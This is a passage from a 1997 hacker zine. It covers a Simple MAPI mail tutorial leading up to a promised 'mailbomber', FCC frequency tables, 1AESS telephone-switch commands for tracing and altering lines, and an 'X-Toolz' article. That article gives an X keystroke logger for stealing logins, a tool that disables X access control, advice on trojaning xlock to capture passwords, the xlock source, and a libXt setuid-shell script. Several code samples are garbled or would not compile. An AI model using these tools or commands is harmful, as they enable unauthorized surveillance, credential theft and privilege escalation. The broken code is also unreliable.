| MAPIAddress ----\ |
| MAPIDetails -----\ |
| MAPIResolveName Addressing Specifics |
|================================================================|
The quickest and easiest way to use Simple MAPI is by using
MAPISendDocuments . You can use this function to create a standard message
with a file attachment ( or attachments). The following my not seem to useful
now, but it is a building block for our next part of this infosheet. Anyway,
the example simply embeds your autoexec.bat into a message.
To compile : cl sendauto.c userlib32.lib
Using MAPISendDocuments:
// Wow look at me! - i'm sendauto.c
#include <windows.h>
#include <mapi.h>
LPMAPISENDDOCUMENTS lpfnMAPISendDocuments;
void SendMsg( HWND hwnd)
{
(*lpfnMAPISendDocuments)((ULONG)hwnd, ";" "C:\\AUTOEXEC.BAT",
"AUTOEXEC.BAT", 0);
MessageBox(hwnd, "Message Sent", "" MB_OK);
}
LRESULT CALLBACK WndProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
switch(uMsg)
{
case WM_LBUTTONDOWN:
SendMSG(hwnd);
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hwnd, uMsg, LPARAM lParam);
}
return 0;
}
int WINAPI WinMAin(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR d3,
int nCmdShow)
{
MSG msg;
HWND hwnd;
WNDCLASS wndClass;
HANDLE hMAPILib;
hMAPILib = LoadLibrary("MAPI32.DLL");
lpfnMAPISendDocuments = (LPMAPISENDDOCUMENTS)GetProcAddress(
hMAPILib, "MAPISendDocuments");
if (hPrevInstance == NULL)
{
memset(&wndClass, 0 , sizeof(wndClass));
wndClass.style = CS_HREDRAW | CS_VREDRAW;
wndClass.lpfnWndProc = WndProc;
wndClass.hInstance = hInstance;
wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
wndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
wndClass.lpszClassName = "HELLO";
if (!RegisterClass(&wndClass)) return FALSE;
}
hwnd = CreateWindow("HELLO", "HELLO" WS_OVERLAPPEDWINDOW, CW_USEDEFAULT,
0, CW_USEDEFAULT, 0, NULL, NULL, hInstance, NULL);
ShowWindow(hwnd, nCmdShow);
UpdateWindow(hwnd);
while (GetMessage(&msg, NULL, 0, 0,))
DispatchMessage(&msg);
FreeLibrary(hMAPILib);
return msg.wParam;
}
MAPISendMail
^^^^^^^^^^^^
A more flexible and easier way to send a message is thru MAPISendMail
With a few simple calls to the API, and 2 structures, you can create a
message with a recipent and an actual message.
Basically, the following code starts off with creating the structures
you need to fill out the message, and it then calls MAPILogin to log on to
the MAPI transport protocol ( in this case, SMTP , since it is internet
e-mail), it then sends the message, and logs off with MAPILogoff.
By the way, this is a simple command line program.
mailbill.c
^^^^^^^^^^
// lets mailbill.c (linton) and tell him to get a life
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
LPMAPISENDMAIL lpfnMAPISendMail;
LPMAPILOGON lpfnMAPILogon;
LPMAPILOGOFF lpfnMAPILogoff;
MapiRecipDesc recipent =
{
0, MAPI_TO, "Bill Clinton", "SMTP:president@whitehouse.gov",
0, NULL
};
MapiMessage message =
{
0, "Greetings" "Bill,\n give up your crazy Communications Decency Act,
and your Clipper Chip project and come out with your hands up!",
NULL, NULL, NULL, 0, NULL, 1, &recipent, 0, NULL
};
void main(void)
{
LHANDLE lhSession;
HANDLE hMAPILib;
hMAPILib = LoadLibrary("MAPI32.DLL");
lpfnMAPILogon = (LPMAPILOGON)GetProcAddress(hMAPILib, "MAPILogin");
lpfnMAPISendMail = (LPMAPISENDMAIL)GetProcAddress(hMAPILib,
"MAPISendMail");
lpfnMAPILogoff = (LPMAPILOGOFF)GetProcAddress(hMAPILib, "MAPILogoff");
(*lpfnMAPILogin)(0,NULL,NULL, MAPI_ALLOW_OTHERS, 0, &lhSession);
(*lpfnMAPISendMAil)(lhSession, 0, &message, 0,0);
(*lpfnMAPILogoff)(lhSession,0,0,0);
printf("Message to the White House is sent.\n");
FreeLibrary(hMAPILib);
}
This program will work best if you already have your ISP connection
going, so start that up first. Oh, and by the way, these are all ment for
Visual C++ 4.0, i dont know how well compile, or if they compile under 2.0
or below.
Ok, well this is all for this month, next month i will show you a bit
more about MAPI, and then i will give you the code to the MAPI Mailbomber,
which is what the article is supposed to be all about.
_____________________________________________________________
-------------------------------
--=[FCC Frequency Allocations]=--
Written by Keystroke
-------------------------------
FREQUENCY RANGE ABBREVIATION CLASSIFICATION
30Hz-300Hz ELF Extremely Low frequency
300Hz-3kHz VF Voice frequency
3kHz-30kHz VLF Very Low frequency
30kHz-300kHz LF Low frequency
300kHz-3MHz MF Medium frequency
3MHz-30MHz HF High frequency
30MHz-300MHz VHF Very high frequency
0.3GHz-3GHz UHF Ultrahigh frequency
3GHz-30GHz SHF Super high frequency
30GHz-300GHz EHF Extremely high frequency
0.3THz-4.29THz IR Infared
4.29THz-6.98THz Visible Light
6.98THz-100THz UV Ultraviolet
100PHz-1000EHz X-rays
FREQUENCY (kHz) ALLOCATIONS
300 Marine
400 Aviation
500-1600 AM Radio
2000 Marine, Aviation, and Land Mobil
3000 Amateur, Land Mobile
FREQUENCY (MHZ) ALLOCATIONS
3 Marine
4 Marine
5 Land Mobile
6 Marine, Aviation
7 Amatuer, Aviation
8 Land Mobile
9 Marine
10 Marine, Aviation, Shortwave
16 Aviation, Shortwave
20 Aviation, Shortwave
30 Amateur, Land Mobile
FREQUENCY (MHZ) ALLOCATIONS
30 Land Mobile, Government
40 Government
50 Government
60 TV Channels 2-4 Broadcast
70 Aviation R/C
80 Land Mobile
90 TV Channels 5-6 Broadcast
100 FM Broadcast
160 Amateur Land Mobile
200 TV Channels 7-13 Broadcast
300 Government Satellite
TIP: Put a few scanners around your room, tune them to the same TV station,
put your TV on that station, and listen is Surround Sound! :P
FREQUENCY (MHZ) ALLOCATIONS
300 Aviation
400 Government Satellite
500 General Mobile Radio Service, Land Mobile
600 TV Channels 14-83 Broadcast
700 TV Channels 14-83 Broadcast
800 Land Mobile
900 Land Mobile
1000 Fixed, Microwaves
1600 Aviation
2000 Fixed
3000 Radar
BUGGING FREQUENCIES!!! - http://www.tscm.com/bugfreq.html
There's a file at
file://oak.oakland.edu/pub/hamradio/docs/misc/fcc.allocations that goes in
depth on fcc frequency allocations, the above was a general look at the
frequencies.
Fun Fact #1: A carrier is really a high-frequency signal that is modulated
with a low-frequency information signal. Thats why a modem is a
MODulator-DEModulator, it varies the characteristics of high-frequency
signal, in accordance with the changes in the info. signal (this is
modulation) and retrives the info (low freq.) from the high-frequency
modulated carrier signal (this is demodulation).
Fun Fact #2: kilobyte, megabyte, gigabyte, terabyte, pentabyte, exabyte
_____________________________________________________________
-----------
--=[1aESS]=--
Written by Optimus
-----------
I got some badass 1aess shit, this is basically just my notes on it all
and some basic need to knows. If it ain't enough for you, you should find
something more technical =). I haven't tested any of this, just passing it
along...
All 1aess commands are typed in caps. Verifacation commands end in '.' and
change commands end in '!'. The end of line character is ctrl+d not return,
kinda funky, maybe its the keyboard setup they designed. The backspace key is
underscore.
Basic Commands:
WHO-RV-. Shows system info
V-STOP-. Clears pause buffer (press space to pause)
CI-LIST-. Lists lines currently being traced
NET-LINE-XXXXXXX0000. Live Line Trace
T-DN-RDXXXXXXX. Returns 1 if line is busy, 0 if idle
T-DN-MBXXXXXXX. Forces a line off hook
T-DN-MTXXXXXXX. Forces a line on hook
OP:CHAN:MON! Shows channels being monitored
VFY-DN-30XXXXXXX. Searches for a free fone line
VFY-LEN-4100000000. Lists Free LENs
VFY-TNN-XXXXXXXX. Shows trunk info
Adding lines:
RC:LINE:\ Says that you are adding a line
ORD 1\ Execute immediatly
TN XXXXXXX\ The telephone number of this line
LEN XXXXXXXX\ The LEN for the line
LCC 1FR\ Line Class Code (List later)
XXX YYY\ YYY is the ld company
!
Changing a line:
RC:LINE;CHG:\ Says that you are changing a line
ORD 1\ Execute immediatly
TN XXXXXXX\ The line you are changing
LCC DTF\ Changes line to a pay phone
!
LCC Codes:
These are just basic LCC's there are more that I know about, but they seem
kind of irrelevant
DTF Pay phone
1FR Flat rate
1MR Measured Rate
1PC One Pay Phone
PBM No ani?
PBX What it says
CDF DTF Coin pay phone
CFD Coinless charge-a-call pay phone
INW InWATTS 800
Removing A Line:
RC:LINE;OUT:\ States you are removing a line
ORD 1\ Says you want to remove it now
TN XXXXXXX\ Number of which you are removing
!
Thats basically it, I haven't tested anything so I don't have that much
experience with it but, if you do experiment, drop me a ring telling me
how it went at rewt@null.net -- Optimus
_____________________________________________________________
-------------
--=[X-Toolz]=--
Written by lurk3r
-------------
This article is not a basic how-to-use-Xwin or even a step-by-step guide.
It's just a few scripts and ideas for those who aren't able to find anything
on Xwin and just plain out need a clue. This is also my first article, so
bear with me. It can only get better. I did include the xhost command though,
because it is such a major function.
Basic Command:
Enabling the Xhost
$ xhost +
To allow connections from only a single host for whatever reason, such as to
lessen the chances of someone stumbling upon it from just any server, you
would use the command..
$ xhost + <IP of server>
Recommended: man xwd and man xwud (to find out about dumping screens, very
useful) the Xwindows utility.
$ xwd -root localhost:0.0 > SaveFile
Once you've gotten into the server, poked around and decided that you aren't
able to find any way to get root access or other logins, you may want to try
some of these ideas out. A good way to start is to run a program such as a
key recorder, since xwindows are obviously run on the xserver, then all
keystrokes go through it. The first program you may want to setup is xkey.c,
written by Dominic Giampaolo (nick@cs.maxine.wpi.edu).
To compile type:
gcc -o xkey xkey.c -lX11 -lm
If that doesn't work then your gonna have to RTFM cause I'm not gonna get
into a deep discussion on compiling.
To run it type:
xkey displayname:0
------------------------------------------------------------
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>
char *TranslateKeyCode(XEvent *ev);
Display *d;
void snoop_all_windows(Window root, unsigned long type)
{
static int level = 0;
Window parent, *children, *child2;
unsigned int nchildren;
int stat, i,j,k;
level++;
stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
if (stat == FALSE)
{
fprintf(stderr, "Can't query window tree...\n");
return;
}
if (nchildren == 0)
return;
/* For a more drastic indication of the problem being exploited
* here, you can change these calls to XSelectInput() to something
* like XClearWindow(d, children[i]) or if you want to be real
* nasty, do XKillWindow(d, children[i]). Of course if you do that,
* then you'll want to remove the loop in main().
*
* The whole point of this exercise being that I shouldn't be
* allowed to manipulate resources which do not belong to me.
*/
XSelectInput(d, root, type);
for(i=0; i < nchildren; i++)
{
XSelectInput(d, children[i], type);
snoop_all_windows(children[i], type);
}
XFree((char *)children);
}
void main(int argc, char **argv)
{
char *hostname;
char *string;
XEvent xev;
int count = 0;
if (argv[1] == NULL)
hostname = ":0";
else
hostname = argv[1];
d = XOpenDisplay(hostname);
if (d == NULL)
{
fprintf(stderr, "Blah, can't open display: %s\n", hostname);
exit(10);
}
snoop_all_windows(DefaultRootWindow(d), KeyPressMask);
while(1)
{
XNextEvent(d, &xev);
string = TranslateKeyCode(&xev);
if (string == NULL)
continue;
if (*string == '\r')
printf("\n");
else if (strlen(string) == 1)
printf("%s", string);
else
printf("<<%s>>", string);
fflush(stdout);
}
}
#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];
char *TranslateKeyCode(XEvent *ev)
{
int count;
char *tmp;
KeySym ks;
if (ev)
{
count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
key_buff[count] = '\0';
if (count == 0)
{
tmp = XKeysymToString(ks);
if (tmp)
strcpy(key_buff, tmp);
else
strcpy(key_buff, "");
}
return key_buff;
}
else
return NULL;
}
------------------------------------------------------------
Since this is a keystroke recorder and not a sniffer, it can be very helpful
in finding out about the system you are on, and possibly getting you into
other systems that the user at console connects to, such as FTP sites and
other shell acounts. I've noticed that alot of students have multiple shells,
and like to check their mail on multiple systems through one account. If
you're lucky enough to find one of these guys, you'll be set up for a while.
Another useful tool that I have used is called crowbar.c.
This program can be used after you have a connection to someones display, and
say someone decides to "xhost -" you.
This program will allow you to XDisableAccessControl()
------------------------------------------------------
#include <stdio.h>
#include <X11/Xlib.h>
#include <ctype.h>
main (int argc, char *argv[])
{
Display *dpy;
char *dis = NULL;
int c;
dis= argv[1];
if ((dpy = XOpenDisplay(dis))==NULL){
perror("could not open window");
exit(0);
}
while ((c=getchar())!='q')
XDisableAccessControl(dpy);
XCloseDisplay(dpy);
}
------------------------------------------------------------
Another program or thought that may be useful, (if you know how to code)
would be to install a trojan or trick to get peoples passwords from them. One
thing that most people might not think anything about when they sit down at
their desk at school or work is when they see a screen saver on. If you've
ever been into a place that has lots of computers, even after they have
closed for the night you will notice that at least 70% of them are left on
with just a screen saver running. So why not edit the GetPassword routine of
the screensaver program to capture the passwords that people enter? Anyone
seeing the process table won't think twice when they see the screensaver
program running. You'll have to go through and edit this yourself, or in the
future maybe I or another person in HBS can provide one, but here is the code
for the screensaver that I have found to be the most widely used.
Xlock.c
------------------------------------------------------------
#include <stdio.h>
#include <signal.h>
#include <string.h>
#include <pwd.h>
#include "xlock.h"
#include <X11/cursorfont.h>
#include <X11/Xatom.h>
extern char *crypt();
extern char *getenv();
char *ProgramName; /* argv[0] */
perscreen Scr[MAXSCREENS];
Display *dsp = NULL; /* server display connection */
int screen; /* current screen */
void (*callback) () = NULL;
void (*init) () = NULL;
static int screens; /* number of screens */
static Window win[MAXSCREENS]; /* window used to cover screen */
static Window icon[MAXSCREENS]; /* window used during password typein */
static Window root[MAXSCREENS]; /* convenience pointer to the root window */
static GC textgc[MAXSCREENS]; /* grphx context used for text rendering */
static long fgcol[MAXSCREENS]; /* used for text rendering */
static long bgcol[MAXSCREENS]; /* background of text screen */
static int iconx[MAXSCREENS]; /* location of left edge of icon */
static int icony[MAXSCREENS]; /* location of top edge of icon */
static Cursor mycursor; /* blank cursor */
static Pixmap lockc;
static Pixmap lockm; /* pixmaps for cursor and mask */
static char no_bits[] = {0}; /* dummy array for the blank cursor */
static int passx; /* position of the ?'s */
static int passy;
static XFontStruct *font;
static int sstimeout; /* screen saver parameters */
static int ssinterval;
static int ssblanking;
static int ssexposures;
#define PASSLENGTH 20
#define FALLBACK_FONTNAME "fixed"
#define ICONW 64
#define ICONH 64
#define AllPointerEventMask \
(ButtonPressMask | ButtonReleaseMask | \
EnterWindowMask | LeaveWindowMask | \
PointerMotionMask | PointerMotionHintMask | \
Button1MotionMask | Button2MotionMask | \
Button3MotionMask | Button4MotionMask | \
Button5MotionMask | ButtonMotionMask | \
KeymapStateMask)
/* VARARGS1 */
void
error(s1, s2)
char *s1, *s2;
{
fprintf(stderr, s1, ProgramName, s2);
exit(1);
}
/*
* Server access control support.
*/
static XHostAddress *XHosts; /* the list of "friendly" client machines */
static int HostAccessCount; /* the number of machines in XHosts */
static Bool HostAccessState; /* whether or not we even look at the list */
static void
XGrabHosts(dsp)
Display *dsp;
{
XHosts = XListHosts(dsp, &HostAccessCount, &HostAccessState);
if (XHosts)
XRemoveHosts(dsp, XHosts, HostAccessCount);
XEnableAccessControl(dsp);
}
static void
XUngrabHosts(dsp)
Display *dsp;
{
if (XHosts) {
XAddHosts(dsp, XHosts, HostAccessCount);
XFree((char *) XHosts);
}
if (HostAccessState == False)
XDisableAccessControl(dsp);
}
/*
* Simple wrapper to get an asynchronous grab on the keyboard and mouse.
* If either grab fails, we sleep for one second and try again since some
* window manager might have had the mouse grabbed to drive the menu choice
* that picked "Lock Screen..". If either one fails the second time we print
* an error message and exit.
*/
static void
GrabKeyboardAndMouse()
{
Status status;
status = XGrabKeyboard(dsp, win[0], True,
GrabModeAsync, GrabModeAsync, CurrentTime);
if (status != GrabSuccess) {
sleep(1);
status = XGrabKeyboard(dsp, win[0], True,
GrabModeAsync, GrabModeAsync, CurrentTime);
if (status != GrabSuccess)
error("%s: couldn't grab keyboard! (%d)\n", status);
}
status = XGrabPointer(dsp, win[0], True, AllPointerEventMask,
GrabModeAsync, GrabModeAsync, None, mycursor,
CurrentTime);
if (status != GrabSuccess) {
sleep(1);
status = XGrabPointer(dsp, win[0], True, AllPointerEventMask,
GrabModeAsync, GrabModeAsync, None, mycursor,
CurrentTime);
if (status != GrabSuccess)
error("%s: couldn't grab pointer! (%d)\n", status);
}
}
/*
* Assuming that we already have an asynch grab on the pointer,
* just grab it again with a new cursor shape and ignore the return code.
*/
static void
XChangeGrabbedCursor(cursor)
Cursor cursor;
{
#ifndef DEBUG
(void) XGrabPointer(dsp, win[0], True, AllPointerEventMask,
GrabModeAsync, GrabModeAsync, None, cursor, CurrentTime);
#endif
}
/*
* Restore all grabs, reset screensaver, restore colormap, close connection.
*/
static void
finish()
{
XSync(dsp, False);
if (!nolock && !allowaccess)
XUngrabHosts(dsp);
XUngrabPointer(dsp, CurrentTime);
XUngrabKeyboard(dsp, CurrentTime);
if (!enablesaver)
XSetScreenSaver(dsp, sstimeout, ssinterval, ssblanking, ssexposures);
XFlush(dsp);
XCloseDisplay(dsp);
}
static int
ReadXString(s, slen)
char *s;
int slen;
{
XEvent event;
char keystr[20];
char c;
int i;
int bp;
int len;
int thisscreen = screen;
char pwbuf[PASSLENGTH];
for (screen = 0; screen < screens; screen++)
if (thisscreen == screen)
init(icon[screen]);
else
init(win[screen]);
bp = 0;
*s = 0;
while (True) {
unsigned long lasteventtime = seconds();
while (!XPending(dsp)) {
for (screen = 0; screen < screens; screen++)
if (thisscreen == screen)
callback(icon[screen]);
else
callback(win[screen]);
XFlush(dsp);
usleep(delay);
if (seconds() - lasteventtime > timeout) {
screen = thisscreen;
return 1;
}
}
screen = thisscreen;
XNextEvent(dsp, &event);
switch (event.type) {
case KeyPress:
len = XLookupString((XKeyEvent *) & event, keystr, 20, NULL, NULL);
for (i = 0; i < len; i++) {
c = keystr[i];
switch (c) {
case 8: /* ^H */
case 127: /* DEL */
if (bp > 0)
bp--;
break;
case 10: /* ^J */
case 13: /* ^M */
s[bp] = '\0';
return 0;
case 21: /* ^U */
bp = 0;
break;
default:
s[bp] = c;
if (bp < slen - 1)
bp++;
else
XSync(dsp, True); /* flush input buffer */
}
}
XSetForeground(dsp, Scr[screen].gc, bgcol[screen]);
if (echokeys) {
memset(pwbuf, '?', slen);
XFillRectangle(dsp, win[screen], Scr[screen].gc,
passx, passy - font->ascent,
XTextWidth(font, pwbuf, slen),
font->ascent + font->descent);
XDrawString(dsp, win[screen], textgc[screen],
passx, passy, pwbuf, bp);
}
/*
* eat all events if there are more than enough pending... this
* keeps the Xlib event buffer from growing larger than all
* available memory and crashing xlock.
*/
if (XPending(dsp) > 100) { /* 100 is arbitrarily big enough */
register Status status;
do {
status = XCheckMaskEvent(dsp,
KeyPressMask | KeyReleaseMask, &event);
} while (status);
XBell(dsp, 100);
}
break;
case ButtonPress:
if (((XButtonEvent *) & event)->window == icon[screen]) {
return 1;
}
break;
case VisibilityNotify:
if (event.xvisibility.state != VisibilityUnobscured) {
#ifndef DEBUG
XRaiseWindow(dsp, win[screen]);
#endif
s[0] = '\0';
return 1;
}
break;
case KeymapNotify:
case KeyRelease:
case ButtonRelease:
case MotionNotify:
case LeaveNotify:
case EnterNotify:
break;
default:
fprintf(stderr, "%s: unexpected event: %d\n",
ProgramName, event.type);
break;
}
}
}
static int
getPassword()
{
char buffer[PASSLENGTH];
char userpass[PASSLENGTH];
char rootpass[PASSLENGTH];
char *user;
XWindowAttributes xgwa;
int y, left, done;
struct passwd *pw;
pw = getpwnam("root");
strcpy(rootpass, pw->pw_passwd);
pw = getpwnam(cuserid(NULL));
strcpy(userpass, pw->pw_passwd);
user = pw->pw_name;
XGetWindowAttributes(dsp, win[screen], &xgwa);
XChangeGrabbedCursor(XCreateFontCursor(dsp, XC_left_ptr));
XSetForeground(dsp, Scr[screen].gc, bgcol[screen]);
XFillRectangle(dsp, win[screen], Scr[screen].gc,
0, 0, xgwa.width, xgwa.height);
XMapWindow(dsp, icon[screen]);
XRaiseWindow(dsp, icon[screen]);
left = iconx[screen] + ICONW + font->max_bounds.width;
y = icony[screen] + font->ascent;
XDrawString(dsp, win[screen], textgc[screen],
left, y, text_name, strlen(text_name));
XDrawString(dsp, win[screen], textgc[screen],
left + 1, y, text_name, strlen(text_name));
XDrawString(dsp, win[screen], textgc[screen],
left + XTextWidth(font, text_name, strlen(text_name)), y,
user, strlen(user));
y += font->ascent + font->descent + 2;
XDrawString(dsp, win[screen], textgc[screen],
left, y, text_pass, strlen(text_pass));
XDrawString(dsp, win[screen], textgc[screen],
left + 1, y, text_pass, strlen(text_pass));
passx = left + 1 + XTextWidth(font, text_pass, strlen(text_pass))
+ XTextWidth(font, " ", 1);
passy = y;
y = icony[screen] + ICONH + font->ascent + 2;
XDrawString(dsp, win[screen], textgc[screen],
iconx[screen], y, text_info, strlen(text_info));
XFlush(dsp);
y += font->ascent + font->descent + 2;
done = False;
while (!done) {
if (ReadXString(buffer, PASSLENGTH))
break;
/*
* we don't allow for root to have no password, but we handle the case
* where the user has no password correctly; they have to hit return
* only
*/
done = !((strcmp(crypt(buffer, userpass), userpass))
&& (!allowroot || strcmp(crypt(buffer, rootpass), rootpass)));
if (!done && *buffer == NULL) {
/* just hit return, and it wasn't his password */
break;
}
if (*userpass == NULL && *buffer != NULL) {
/*
* the user has no password, but something was typed anyway.
* sounds fishy: don't let him in...
*/
done = False;
}
/* clear plaintext password so you can't grunge around /dev/kmem */
memset(buffer, 0, sizeof(buffer));
XSetForeground(dsp, Scr[screen].gc, bgcol[screen]);
XFillRectangle(dsp, win[screen], Scr[screen].gc,
iconx[screen], y - font->ascent,
XTextWidth(font, text_invalid, strlen(text_invalid)),
font->ascent + font->descent + 2);
XDrawString(dsp, win[screen], textgc[screen],
iconx[screen], y, text_valid, strlen(text_valid));
if (done)
return 0;
else {
XSync(dsp, True); /* flush input buffer */
sleep(1);
XFillRectangle(dsp, win[screen], Scr[screen].gc,
iconx[screen], y - font->ascent,
XTextWidth(font, text_valid, strlen(text_valid)),
font->ascent + font->descent + 2);
XDrawString(dsp, win[screen], textgc[screen],
iconx[screen], y, text_invalid, strlen(text_invalid));
if (echokeys) /* erase old echo */
XFillRectangle(dsp, win[screen], Scr[screen].gc,
passx, passy - font->ascent,
xgwa.width - passx,
font->ascent + font->descent);
}
}
XChangeGrabbedCursor(mycursor);
XUnmapWindow(dsp, icon[screen]);
return 1;
}
static void
justDisplay()
{
XEvent event;
for (screen = 0; screen < screens; screen++)
init(win[screen]);
do {
while (!XPending(dsp)) {
for (screen = 0; screen < screens; screen++)
callback(win[screen]);
XFlush(dsp);
usleep(delay);
}
XNextEvent(dsp, &event);
#ifndef DEBUG
if (event.type == VisibilityNotify)
XRaiseWindow(dsp, event.xany.window);
#endif
} while (event.type != ButtonPress && event.type != KeyPress);
for (screen = 0; screen < screens; screen++)
if (event.xbutton.root == RootWindow(dsp, screen))
break;
if (usefirst)
XPutBackEvent(dsp, &event);
}
static void
sigcatch()
{
finish();
error("%s: caught terminate signal.\nAccess control list restored.\n");
}
static void
lockDisplay()
{
if (!allowaccess) {
#ifdef SYSV
sigset_t oldsigmask;
sigset_t newsigmask;
sigemptyset(&newsigmask);
sigaddset(&newsigmask, SIGHUP);
sigaddset(&newsigmask, SIGINT);
sigaddset(&newsigmask, SIGQUIT);
sigaddset(&newsigmask, SIGTERM);
sigprocmask(SIG_BLOCK, &newsigmask, &oldsigmask);
#else
int oldsigmask;
oldsigmask = sigblock(sigmask(SIGHUP) |
sigmask(SIGINT) |
sigmask(SIGQUIT) |
sigmask(SIGTERM));
#endif
signal(SIGHUP, (void (*) ()) sigcatch);
signal(SIGINT, (void (*) ()) sigcatch);
signal(SIGQUIT, (void (*) ()) sigcatch);
signal(SIGTERM, (void (*) ()) sigcatch);
XGrabHosts(dsp);
#ifdef SYSV
sigprocmask(SIG_SETMASK, &oldsigmask, &oldsigmask);
#else
sigsetmask(oldsigmask);
#endif
}
do {
justDisplay();
} while (getPassword());
}
long
allocpixel(cmap, name, def)
Colormap cmap;
char *name;
char *def;
{
XColor col;
XColor tmp;
XParseColor(dsp, cmap, name, &col);
if (!XAllocColor(dsp, cmap, &col)) {
fprintf(stderr, "couldn't allocate: %s, using %s instead\n",
name, def);
XAllocNamedColor(dsp, cmap, def, &col, &tmp);
}
return col.pixel;
}
int
main(argc, argv)
int argc;
char *argv[];
{
XSetWindowAttributes xswa;
XGCValues xgcv;
XColor nullcolor;
ProgramName = strrchr(argv[0], '/');
if (ProgramName)
ProgramName++;
else
ProgramName = argv[0];
srandom(time((long *) 0)); /* random mode needs the seed set. */
GetResources(argc, argv);
CheckResources();
font = XLoadQueryFont(dsp, fontname);
if (font == NULL) {
fprintf(stderr, "%s: can't find font: %s, using %s...\n",
ProgramName, fontname, FALLBACK_FONTNAME);
font = XLoadQueryFont(dsp, FALLBACK_FONTNAME);
if (font == NULL)
error("%s: can't even find %s!!!\n", FALLBACK_FONTNAME);
}
screens = ScreenCount(dsp);
if (screens > MAXSCREENS)
error("%s: can only support %d screens.\n", MAXSCREENS);
for (screen = 0; screen < screens; screen++) {
Screen *scr = ScreenOfDisplay(dsp, screen);
Colormap cmap = DefaultColormapOfScreen(scr);
root[screen] = RootWindowOfScreen(scr);
bgcol[screen] = allocpixel(cmap, background, "White");
fgcol[screen] = allocpixel(cmap, foreground, "Black");
if (mono || CellsOfScreen(scr) == 2) {
Scr[screen].pixels[0] = fgcol[screen];
Scr[screen].pixels[1] = bgcol[screen];
Scr[screen].npixels = 2;
} else {
int colorcount = NUMCOLORS;
u_char red[NUMCOLORS];
u_char green[NUMCOLORS];
u_char blue[NUMCOLORS];
int i;
hsbramp(0.0, saturation, 1.0, 1.0, saturation, 1.0, colorcount,
red, green, blue);
Scr[screen].npixels = 0;
for (i = 0; i < colorcount; i++) {
XColor xcolor;
xcolor.red = red[i] << 8;
xcolor.green = green[i] << 8;
xcolor.blue = blue[i] << 8;
xcolor.flags = DoRed | DoGreen | DoBlue;
if (!XAllocColor(dsp, cmap, &xcolor))
break;
Scr[screen].pixels[i] = xcolor.pixel;
Scr[screen].npixels++;
}
if (verbose)
fprintf(stderr, "%d pixels allocated\n", Scr[screen].npixels);
}
xswa.override_redirect = True;
xswa.background_pixel = BlackPixelOfScreen(scr);
xswa.event_mask = KeyPressMask | ButtonPressMask | VisibilityChangeMask;
#ifdef DEBUG
#define WIDTH WidthOfScreen(scr) - 100
#define HEIGHT HeightOfScreen(scr) - 100
#define CWMASK CWBackPixel | CWEventMask
#else
#define WIDTH WidthOfScreen(scr)
#define HEIGHT HeightOfScreen(scr)
#define CWMASK CWOverrideRedirect | CWBackPixel | CWEventMask
#endif
win[screen] = XCreateWindow(dsp, root[screen], 0, 0, WIDTH, HEIGHT, 0,
CopyFromParent, InputOutput, CopyFromParent,
CWMASK, &xswa);
#ifdef DEBUG
{
XWMHints xwmh;
xwmh.flags = InputHint;
xwmh.input = True;
XChangeProperty(dsp, win[screen],
XA_WM_HINTS, XA_WM_HINTS, 32, PropModeReplace,
(unsigned char *) &xwmh, sizeof(xwmh) / sizeof(int));
}
#endif
iconx[screen] = (DisplayWidth(dsp, screen) -
XTextWidth(font, text_info, strlen(text_info))) / 2;
icony[screen] = DisplayHeight(dsp, screen) / 6;
xswa.border_pixel = fgcol[screen];
xswa.background_pixel = bgcol[screen];
xswa.event_mask = ButtonPressMask;
#define CIMASK CWBorderPixel | CWBackPixel | CWEventMask
icon[screen] = XCreateWindow(dsp, win[screen],
iconx[screen], icony[screen],
ICONW, ICONH, 1, CopyFromParent,
InputOutput, CopyFromParent,
CIMASK, &xswa);
XMapWindow(dsp, win[screen]);
XRaiseWindow(dsp, win[screen]);
xgcv.foreground = WhitePixelOfScreen(scr);
xgcv.background = BlackPixelOfScreen(scr);
Scr[screen].gc = XCreateGC(dsp, win[screen],
GCForeground | GCBackground, &xgcv);
xgcv.foreground = fgcol[screen];
xgcv.background = bgcol[screen];
xgcv.font = font->fid;
textgc[screen] = XCreateGC(dsp, win[screen],
GCFont | GCForeground | GCBackground, &xgcv);
}
lockc = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1);
lockm = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1);
mycursor = XCreatePixmapCursor(dsp, lockc, lockm,
&nullcolor, &nullcolor, 0, 0);
XFreePixmap(dsp, lockc);
XFreePixmap(dsp, lockm);
if (!enablesaver) {
XGetScreenSaver(dsp, &sstimeout, &ssinterval,
&ssblanking, &ssexposures);
XSetScreenSaver(dsp, 0, 0, 0, 0); /* disable screen saver */
}
#ifndef DEBUG
GrabKeyboardAndMouse();
#endif
nice(nicelevel);
if (nolock)
justDisplay();
else
lockDisplay();
finish();
return 0;
}
------------------------------------------------------------
I've also provided one small code for an example of a lib-x hack.
------------------------------------------------------------
#!/bin/sh
mkdir /tmp/.werd
cd /tmp/.werd
cat << _EOF_ > Initialize.c
_XtAppInitialize() {
setuid(0);
execl("/bin/sh", "sh", 0);
}
XtAppSetFallbackResources() {}
_XtDisplayInitialize() {}
_EOF_
ar x /usr/lib/libXt.a
cc -c -pic Initialize.c
ld *.o
mkdir lib lib/X
mv a.out lib/X/libXt.so.4.1
cd lib/X
echo "git reddy for da fun, du0dz"
xterm
------------------------------------------------------------
theLURK3R - http://home.earthlink.net/~rseal/index.htm
Personal Greetz:
Channels: #Virii #Phreak #Hackers
People: Hibislea FA-Q Darcangel ICBM _RefluX_ Wrd btm Scud-O memor
_____________________________________________________________
©1997 HAVOC Bell Systems Publishing
No part of this publication may be reproduced in whole or in part without the
expressed written consent of HAVOC Bell Systems Publishing. THTJ is all
natural, contains no preservatives, and absolutely no lead. Do not read THTJ
while operating heavy machinery. Do not give THTJ to your favorite operator.
Do not pass go. Do not collect $200. Smoking THTJ may cause cancer.
Plagiarizing this publication is a crime against humanity.
_____________________________________________________________
----------
--=[TFTP]=--
Written by Scud-O
